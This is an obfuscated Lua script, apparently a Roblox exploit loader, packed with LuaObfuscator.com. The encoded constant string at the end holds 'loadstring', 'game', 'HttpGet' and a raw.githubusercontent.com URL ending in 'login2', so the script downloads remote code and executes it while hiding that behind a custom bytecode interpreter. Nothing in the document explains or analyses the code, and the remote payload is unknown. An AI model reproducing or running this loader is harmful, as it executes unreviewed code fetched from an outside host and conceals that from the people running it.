--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16)local v17=1;local v18;v15=v4(v3(v15,5),"..",function(v29)if (v1(v29,2)==79) then local v64=0;while true do if (0==v64) then v18=v0(v3(v29,1,1));return "";end end else local v65=0;local v66;while true do if (0==v65) then v66=v2(v0(v29,16));if v18 then local v80=v5(v66,v18);v18=nil;return v80;else return v66;end break;end end end end);local function v19(v30,v31,v32)if v32 then local v67=(4465 -2655) -(1766 + 44);local v68;while true do if (v67==0) then v68=(v30/((4 -2)^(v31-(2 -1))))%((1 + 1)^(((v32-(1 + (0 -0))) -(v31-(1 + 0 + 0))) + (3 -(2 -0))));return v68-(v68%(1 + 0));end end else local v69=(76 -(34 + 40))^(v31-1);return (((v30%(v69 + v69))>=v69) and (353 -(145 + 207))) or (0 + 0);end end local function v20()local v37=v1(v15,v17,v17);v17=v17 + 1;return v37;end local function v21()local v38,v39=v1(v15,v17,v17 + (1519 -(1397 + 120)));v17=v17 + (1320 -(44 + 1274));return (v39 * (40 + 216)) + v38;end local function v22()local v40,v41,v42,v43=v1(v15,v17,v17 + (3 -0));v17=v17 + (15 -11);return (v43 * (46065543 -29288327)) + (v42 * ((600247 -316289) -218422)) + (v41 * (1570 -(975 + 339))) + v40;end local function v23()local v44=v22();local v45=v22();return (( -(3 -1) * v19(v45,62 -30)) + (1 -0)) * ((4 -2)^(v19(v45,(1573 -(588 + 903)) -61,109 -78) -(258 + 765))) * ((((v19(v45,1 + 0,29 -9) * ((4 -2)^(17 + (66 -51)))) + v44)/(2^(166 -114))) + 1 + 0);end local function v24(v33)local v46;if  not v33 then local v70=0 -(0 -0);while true do if (v70==(0 + 0 + 0)) then v33=v22();if (v33==0) then return "";end break;end end end v46=v3(v15,v17,(v17 + v33) -1);v17=v17 + v33;local v47={};for v62=1643 -(205 + 1437), #v46 do v47[v62]=v2(v1(v3(v46,v62,v62)));end return v6(v47);end local v25=v22;local function v26(...)return {...},v11("#",...);end local function v27()local v48=0;local v49;local v50;local v51;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v48~=(1801 -(972 + 829))) then else v49=0 -0;v50=nil;v48=1;end if (v48~=1) then else v51=nil;v52=nil;v48=2 -0;end if (v48==4) then v57=nil;while true do if (v49==(0 + 0)) then local v76=1230 -(368 + 862);while true do if (v76==(2 -1)) then v49=1 + 0;break;end if (v76==0) then v50=1231 -(1029 + 202);v51=nil;v76=3 -2;end end end if (4~=v49) then else while true do if (v50==(0 + 0)) then local v97=1838 -(757 + 1081);local v98;while true do if ((408 -(389 + 19))==v97) then v98=0;while true do if (v98~=(0 + 0)) then else local v107=0 -0;while true do if (v107==1) then v98=1634 -(21 + 1612);break;end if (v107==0) then v51=0 + 0;v52=nil;v107=1345 -(552 + 792);end end end if ((1 + 0)==v98) then v50=168 -(74 + 93);break;end end break;end end end if (v50~=3) then else v57=nil;while true do local v102=0;local v103;while true do if (v102==0) then v103=0;while true do if (v103~=1) then else if (v51==(972 -(183 + 788))) then local v109=0 + 0;local v110;local v111;while true do if (v109~=(0 -0)) then else v110=0;v111=nil;v109=1;end if (v109==(1 + 0)) then while true do if (v110==(0 + 0)) then v111=0;while true do if (v111~=0) then else v55={v52,v53,nil,v54};v56=v22();v111=1 + 0;end if (v111==1) then v57={};v51=2;break;end end break;end end break;end end end if (v51~=0) then else local v112=0;local v113;local v114;while true do if (v112==(621 -(288 + 332))) then while true do if (v113~=(0 + 0)) then else v114=0 + 0;while true do if (v114==(682 -(596 + 85))) then v54={};v51=1;break;end if (v114==(0 + 0)) then v52={};v53={};v114=2 -1;end end break;end end break;end if (v112==0) then v113=0;v114=nil;v112=1;end end end break;end if (v103~=0) then else local v108=0;while true do if (v108==(1 + 0)) then v103=632 -(587 + 44);break;end if ((0 -0)~=v108) then else if (v51~=3) then else local v130=0;local v131;while true do if (v130==(0 + 0)) then v131=0 -0;while true do if (v131==0) then local v142=0;local v143;while true do if (v142==0) then v143=0 + 0;while true do if ((589 -(18 + 570))==v143) then v131=1255 -(310 + 944);break;end if ((0 + 0)~=v143) then else local v157=0;while true do if (v157==(1487 -(1276 + 210))) then v143=1839 -(986 + 852);break;end if (v157~=0) then else for v164=1,v22() do v53[v164-(3 -2)]=v27();end for v166=1,v22() do v54[v166]=v22();end v157=1;end end end end break;end end end if ((1 + 0)==v131) then return v55;end end break;end end end if (v51==2) then local v132=0;local v133;while true do if (v132==(0 + 0)) then v133=0 -0;while true do if (v133~=1) then else for v145=1,v22() do local v146=0;local v147;local v148;while true do if (v146~=1) then else while true do if (v147==0) then v148=v20();if (v19(v148,1,1 + 0)==0) then local v158=0 -0;local v159;local v160;local v161;local v162;local v163;while true do if (v158~=2) then else v163=nil;while true do if (v159==1) then v162=nil;v163=nil;v159=2;end if (v159==(0 + 0)) then local v168=0;local v169;while true do if (v168==(0 -0)) then v169=0 -0;while true do if (v169~=1) then else v159=1;break;end if (v169==0) then v160=0;v161=nil;v169=1;end end break;end end end if (v159~=(4 -2)) then else while true do if ((0 + 0)~=v160) then else local v170=0;local v171;while true do if ((0 -0)~=v170) then else v171=1983 -(722 + 1261);while true do if (0~=v171) then else local v179=43 -(18 + 25);while true do if (v179~=(0 + 0)) then else v161=v19(v148,5 -3,14 -11);v162=v19(v148,4,373 -(304 + 63));v179=1;end if (v179~=1) then else v171=3 -2;break;end end end if (v171==1) then v160=1 -0;break;end end break;end end end if (2==v160) then local v172=1293 -(351 + 942);local v173;while true do if (0==v172) then v173=1402 -(627 + 775);while true do if (v173~=0) then else local v180=0 -0;while true do if (v180==(1 -0)) then v173=3 -2;break;end if (v180~=(0 + 0)) then else if (v19(v162,1,1 + 0)==(1 + 0)) then v163[943 -(606 + 335)]=v57[v163[2 + 0]];end if (v19(v162,2,5 -3)==1) then v163[3]=v57[v163[3]];end v180=1 + 0;end end end if (v173~=(508 -(265 + 242))) then else v160=3;break;end end break;end end end if (v160~=1) then else local v174=0 -0;while true do if (v174==0) then local v177=0 + 0;local v178;while true do if (v177~=(0 -0)) then else v178=859 -(647 + 212);while true do if (1~=v178) then else v174=2 -1;break;end if ((0 + 0)==v178) then v163={v21(),v21(),nil,nil};if (v161==0) then local v183=177 -(80 + 97);local v184;local v185;while true do if (v183~=(1279 -(1028 + 250))) then else while true do if (v184~=0) then else v185=0;while true do if (v185==0) then v163[3]=v21();v163[4]=v21();break;end end break;end end break;end if (v183==(0 -0)) then v184=0;v185=nil;v183=1;end end elseif (v161==1) then v163[2 + 1]=v22();elseif (v161==(5 -3)) then v163[11 -8]=v22() -(2^16);elseif (v161==3) then local v188=0;local v189;while true do if (v188==(1004 -(984 + 20))) then v189=0 + 0;while true do if (v189~=(0 + 0)) then else v163[11 -8]=v22() -(2^16);v163[4]=v21();break;end end break;end end end v178=1;end end break;end end end if (v174==1) then v160=2 + 0;break;end end end if (v160~=(3 + 0)) then else if (v19(v162,1 + 2,3 + 0)==(1965 -(1268 + 696))) then v163[6 -2]=v57[v163[4]];end v52[v145]=v163;break;end end break;end end break;end if (v158==(1485 -(1071 + 414))) then v159=0;v160=nil;v158=1;end if (v158==(1240 -(305 + 934))) then v161=nil;v162=nil;v158=938 -(526 + 410);end end end break;end end break;end if (v146~=0) then else v147=0;v148=nil;v146=1;end end end v51=3;break;end if (v133==(0 -0)) then for v149=3 -2,v56 do local v150=0 -0;local v151;local v152;while true do if (v150==(3 -2)) then if (v151==1) then v152=v20()~=0;elseif (v151==2) then v152=v23();elseif (v151~=(1 + 2)) then else v152=v24();end v57[v149]=v152;break;end if (v150~=(0 -0)) then else local v156=0 -0;while true do if (v156==(1030 -(270 + 760))) then v151=v20();v152=nil;v156=1 -0;end if (v156==1) then v150=1;break;end end end end end v55[3]=v20();v133=2 -1;end end break;end end end v108=1 + 0;end end end end break;end end end break;end if (v50==2) then local v99=0 + 0;local v100;while true do if (v99~=(0 -0)) then else v100=738 -(113 + 625);while true do if (v100~=(1 + 0)) then else v50=1 + 2;break;end if (v100==0) then v55=nil;v56=nil;v100=1;end end break;end end end if (v50==(1349 -(50 + 1298))) then local v101=0 + 0;while true do if (v101==1) then v50=2;break;end if (v101==(0 -0)) then v53=nil;v54=nil;v101=1;end end end end break;end if (1~=v49) then else local v77=0 -0;while true do if (v77==(1235 -(1090 + 145))) then v52=nil;v53=nil;v77=1;end if (v77~=(144 -(4 + 139))) then else v49=857 -(575 + 280);break;end end end if (v49~=(919 -(210 + 706))) then else local v78=0;while true do if (v78==0) then v56=nil;v57=nil;v78=1313 -(696 + 616);end if (v78~=(2 -1)) then else v49=15 -11;break;end end end if (v49==2) then local v79=0 + 0;while true do if (v79==0) then v54=nil;v55=nil;v79=1 -0;end if (v79~=1) then else v49=3 + 0;break;end end end end break;end if (v48~=(2 + 1)) then else v55=nil;v56=nil;v48=4;end if (v48~=2) then else v53=nil;v54=nil;v48=3;end end end local function v28(v34,v35,v36)local v58=0;local v59;local v60;local v61;while true do if (v58==1) then v61=v34[3];return function(...)local v71=1;local v72= -1;local v73={...};local v74=v11("#",...) -1;local function v75()local v81=v59;local v82=Const;local v83=v60;local v84=v61;local v85=v26;local v86={};local v87={};local v88={};for v94=418 -(195 + 223),v74 do if ((v94>=v84) or ((542 + 410)<(2123 -((768 -587) + 1597)))) then v86[v94-v84]=v73[v94 + (1973 -(1752 + 220))];else v88[v94]=v73[v94 + 1 + 0];end end local v89=(v74-v84) + 1 + 0;local v90;local v91;while true do local v95=(1686 -(1483 + 203)) -(426 -(425 + 1));local v96;while true do if (((2214 -(661 + 480))==(609 + 464)) and (v95==(0 -0))) then v96=0 + 0;while true do if ((v96==(0 -0)) or ((756 + 2426)==(266 + 1254))) then local v106=1247 -(1210 + 37);while true do if ((v106==((0 -0) + 0)) or ((2171 -(220 + 609))>(3636 -(601 + 179)))) then v90=v81[v71];v91=v90[1 + 0];v106=1 -0;end if ((v106==1) or (3799==(3545 -2099))) then v96=1 + 0;break;end end end if ((v96==(206 -(27 + 178))) or ((3621 -(95 + 264))<(1376 + 647))) then if ((((3536 + 1193) -(389 + 624))>((1431 + 2085) -((1313 -(921 + 248)) + 45))) and (v91<=(5 -3))) then if ((v91<=0) or ((150 + 1041)>=(30 + 3275))) then local v115=0 + 0;local v116;local v117;local v118;while true do if (((17100 -12105)>(5229 -3698)) and (v115==(0 -0))) then v116=0 + 0;v117=nil;v115=1 -0;end if ((v115==(2 -(1 + 0))) or ((4352 -(125 + 1605))>=(4825 -(662 + 812)))) then v118=nil;while true do if ((v116==(0 + 0)) or ((14648 -(4625 + 6471))<(7012 -4548))) then local v135=1603 -(840 + 763);while true do if (((4039 -(367 + (501 -315)))<(4205 + 763)) and (v135==(1 + 0 + 0))) then v116=1746 -(894 + 851);break;end if (((8336 -4316)==(2013 + 2007)) and (v135==(0 + 0))) then v117=v90[5 -3];v118=v88[v90[8 -5]];v135=3 -2;end end end if (((2166 -471)==(4763 -3068)) and (v116==(1738 -(9 + 1728)))) then v88[v117 + (2 -1) + 0]=v118;v88[v117]=v118[v90[1 + 3]];break;end end break;end end elseif (((5345 -(1079 + 505))>=(895 + 2309)) and (v91==(1 + 0))) then do return;end else local v119=1200 -(42 + 237 + 885 + 36);local v120;local v121;local v122;local v123;while true do if (((4886 -(282 + (1400 -(695 + 370))))>=(771 -246)) and (v119==(774 -(71 + 701)))) then for v138=v120,v72 do local v139=0;local v140;while true do if ((v139==(353 -(292 + 61))) or ((4109 -(19 + 677))>((9930 -5197) -(174 + 735)))) then v140=0 + 0;while true do if ((827<=(4818 -(110 + 58 + 212))) and (v140==(0 + 0))) then v123=v123 + 1 + 0;v88[v138]=v121[v123];break;end end break;end end end break;end if ((v119==(1664 -(114 + 1550))) or ((112 + 345)>1011)) then v120=v90[1 + 1];v121,v122=v85(v88[v120](v12(v88,v120 + 1 + 0,v90[3 + (860 -(295 + 565))])));v119=1 -0;end if (((528 + 205)<=4141) and (v119==(4 -3))) then local v134=0 + 0;while true do if ((v134==(779 -(747 + 31))) or ((10131 -6489)<=((488 + 2679) -(787 + 354)))) then v119=4 -(1 + 1);break;end if ((v134==(1560 -(349 + 1211))) or (4080>=(4215 -(4 + (13 -6))))) then v72=(v122 + v120) -(2 -(4 -3));v123=0 -0;v134=1 -0;end end end end end elseif ((v91<=4) or (((5624 -(1490 + 475)) -(6389 -3715))>((12007 -(704 + 70)) -7242))) then if ((v91==(164 -(139 + 22))) or ((5785 -(605 + (1274 -721)))==(4520 -(1378 + 293)))) then v88[v90[1 + 1]]=v90[1552 -((3028 -(1167 + 737)) + 425)];else v88[v90[1 + 1]]();end elseif ((v91>(3 + 2)) or ((1853 -(1602 + 200))>=(571 -(299 + 154)))) then local v125=249 -(58 + 191);local v126;local v127;local v128;while true do if (((5367 -1383)>=(8396 -4814)) and (v125==(1333 -(222 + 739 + 372)))) then v126=500 -(2 + 22 + 476);v127=nil;v125=1 + 0;end if (((1 + 0)==v125) or ((785 + 2795)<=(68 + 59))) then v128=nil;while true do if (((424 + 302 + 139)==(371 + (2410 -(1149 + 767)))) and (v126==(368 -((1199 -889) + 58)))) then local v141=1812 -(723 + 1089);while true do if ((v141==(0 -0)) or ((3616 -(33 + 316))<((2362 + 1432) -1786))) then v127=0 -0;v128=nil;v141=1 + 0;end if ((((766 + 1416) -(300 + 66))<(9815 -(3261 + 1855))) and (v141==(897 -((1355 -771) + 312)))) then v126=4 -3;break;end end end if (((661 + 680)==(4040 -2699)) and (v126==(572 -(82 + 489)))) then while true do if ((v127==(1684 -(1364 + (1247 -(55 + 872))))) or (3602>((2309 -1692) + 3457))) then v128=v90[1745 -(1428 + 298 + 17)];v88[v128]=v88[v128](v12(v88,v128 + (1 -0),v72));break;end end break;end end break;end end else v88[v90[586 -(33 + 551)]]=v36[v90[469 -(140 + (484 -158))]];end v71=v71 + (3 -2);break;end end break;end end end end A,B=v26(v10(v75));if  not A[1] then local v92=0;local v93;while true do if (v92==0) then v93=v34[4][v71] or "?";error("Script error at ["   .. v93   .. "]:"   .. A[2]);break;end end else return v12(A,2,B);end end;end if (v58==0) then v59=v34[1];v60=v34[2];v58=1;end end end return v28(v27(),{},v16)();end v14("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F636C69636B636C69636B706F772F706C732F6D61696E2F6C6F67696E3200083O0012053O00013O001205000100023O00202O000100010003001203000300044O0002000100034O00065O00022O00043O000100012O00013O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v8());end
